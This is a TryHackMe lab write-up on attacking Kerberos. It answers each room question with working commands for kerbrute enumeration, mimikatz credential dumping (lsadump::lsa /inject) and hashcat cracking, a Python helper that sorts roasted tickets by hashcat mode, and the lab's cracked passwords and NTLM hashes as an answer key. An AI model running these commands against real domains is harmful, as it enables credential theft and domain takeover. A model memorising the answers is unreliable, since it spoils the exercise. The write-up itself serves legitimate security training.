THM Attacking Kerberos - grunt92/IT-Sec-WriteUps GitHub Wiki

Introduction

What does TGT stand for?

Ticket Granting Ticket

What does SPN stand for?

Service Principal Name

What does PAC stand for?

Privilege Attribute Certificate

What two services make up the KDC?

AS, TGS (the Authentication Service, which issues the TGT, and the Ticket Granting Service, which issues service tickets)

Deploy the Machine

Enumeration w/ Kerbrute

How many total users do we enumerate?

Run kerbrute userenum --dc=<DC-IP> -d=CONTROLLER.local User.txt, replacing <DC-IP> with the domain controller's address. Kerbrute sends an AS-REQ per name in the wordlist and lists only those the KDC answers for; count the valid users it reports.

10

What is the SQL service account name?

sqlservice

What is the second "machine" account name?

machine2

What is the third "user" account name?

user3

Harvesting & Brute-Forcing Tickets w/ Rubeus

Which domain admin do we get a ticket for when harvesting tickets?

Administrator

Which domain controller do we get a ticket for when harvesting tickets?

CONTROLLER-1

Kerberoasting w/ Rubeus & Impacket

What is the HTTPService Password?

Summer2020

What is the SQLService Password?

MYPassword123

AS-REP Roasting w/ Rubeus

What hash type does AS-REP Roasting use?

Kerberos 5, etype 23, AS-REP

Which User is vulnerable to AS-REP Roasting?

User3

What is the User's Password?

Password3

Which Admin is vulnerable to AS-REP Roasting?

Admin2

What is the Admin's Password?

P@$$W0rd2
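Both the Kerberoasting and AS-REP roasting sections above come down to the same step: take the ticket lines Rubeus (with /format:hashcat) or Impacket's GetUserSPNs.py / GetNPUsers.py print, work out which encryption type they use, and feed each batch to the matching hashcat mode. The script below is an added example, not part of this writeup or of the THM room; it parses such lines, maps (ticket kind, etype) to the hashcat mode, and groups principals by mode. The sample hash lines are constructed for the example (short placeholder hex, not captured tickets), and the helper names are my own.

```python
import re

# (kind, etype) -> hashcat mode. etype 23 is RC4-HMAC ("Kerberos 5, etype 23"),
# 17/18 are AES128/AES256, which crack far slower than RC4.
HASHCAT_MODES = {
    ("krb5tgs", 23): 13100,
    ("krb5tgs", 17): 19600,
    ("krb5tgs", 18): 19700,
    ("krb5asrep", 23): 18200,
    ("krb5asrep", 17): 19800,
    ("krb5asrep", 18): 19900,
}

_HEX = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample input (placeholder hex, not real tickets):
# two Kerberoast lines, two AS-REP lines, one AES Kerberoast line
# and one junk line to exercise the error path.
SAMPLE_LINES = [
    "$krb5tgs$23$*HTTPService$CONTROLLER.local$HTTP/CONTROLLER.local*$1c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f$0011223344556677",
    "$krb5tgs$23$*SQLService$CONTROLLER.local$MSSQLSvc/CONTROLLER.local:1433*$0f1e2d3c4b5a69788796a5b4c3d2e1f0$8899aabbccddeeff",
    "$krb5asrep$23$User3@CONTROLLER.local:a1b2c3d4e5f60718293a4b5c6d7e8f90$00ff00ff00ff00ff",
    "$krb5asrep$23$Admin2@CONTROLLER.local:0123456789abcdef0123456789abcdef$ff00ff00ff00ff00",
    "$krb5tgs$18$svc_aes$CONTROLLER.local$abcdef0123456789abcdef01$1122334455667788",
    "not a kerberos hash",
]


def parse_hash_line(line: str) -> dict:
    """Parse one roasted-ticket line into kind, etype, principal and hashcat mode.

    Handles the hashcat-style formats:
      $krb5tgs$23$*user$REALM$spn*$checksum$edata
      $krb5tgs$17|18$user$REALM$checksum$edata
      $krb5asrep$23$user@REALM:checksum$edata
    Raises ValueError for anything else.
    """
    parts = line.strip().split("$")
    if len(parts) < 5 or parts[0] != "" or parts[1] not in ("krb5tgs", "krb5asrep"):
        raise ValueError(f"not a roasted Kerberos ticket line: {line!r}")
    kind, etype = parts[1], int(parts[2])
    edata = parts[-1]
    if not _HEX.match(edata):
        raise ValueError(f"encrypted data is not hex: {line!r}")
    if kind == "krb5asrep":
        # "User3@CONTROLLER.local:checksum" -> keep user@realm only
        principal = parts[3].split(":", 1)[0]
    else:
        principal = parts[3].lstrip("*")
    return {
        "kind": kind,
        "etype": etype,
        "principal": principal,
        "mode": HASHCAT_MODES.get((kind, etype)),
        "edata_bytes": len(edata) // 2,
    }


def triage(lines) -> dict:
    """Group principals by hashcat mode and collect lines that did not parse."""
    by_mode, rejected = {}, []
    for line in lines:
        try:
            info = parse_hash_line(line)
        except ValueError:
            rejected.append(line)
            continue
        by_mode.setdefault(info["mode"], []).append(info["principal"])
    for mode in by_mode:
        by_mode[mode].sort()
    return {"by_mode": by_mode, "rejected": rejected}


def hashcat_command(mode: int, hash_file: str, wordlist: str) -> str:
    """Build the hashcat invocation for one mode; one file per mode keeps runs clean."""
    return f"hashcat -m {mode} {hash_file} {wordlist}"


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for mode, principals in sorted(result["by_mode"].items()):
        print(mode, principals, "->", hashcat_command(mode, f"mode_{mode}.txt", "rockyou.txt"))
    for bad in result["rejected"]:
        print("skipped:", bad)
```

In practice write each mode's lines to their own file before cracking; mixing etype 23 and etype 18 lines in one hashcat run is a common reason a crack "does nothing". The etype 18 line in the sample is there to show why the split matters, not because the room's service accounts use AES.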

Pass the Ticket w/ mimikatz

I understand how a pass the ticket attack works

No answer needed

Golden/Silver Ticket Attacks w/ mimikatz

What is the SQLService NTLM Hash?

Run mimikatz.exe and in mimikatz run privilege::debug first; it must answer Privilege '20' OK, otherwise the session lacks SeDebugPrivilege and the dump will fail. Then run lsadump::lsa /inject /name:SQLService and read the NTLM hash from the output.

cd40c9ed96265531b21fc5b1dafcfb0a

What is the Administrator NTLM Hash?

Run lsadump::lsa /inject /name:Administrator in the same mimikatz session.

2777b7fec870e04dda00cd7260f7bee6

Kerberos Backdoors w/ mimikatz

I understand how to implant a skeleton key into a domain controller with mimikatz

No answer needed

Conclusion

I Understand the Basics of Attacking Kerberos

No answer needed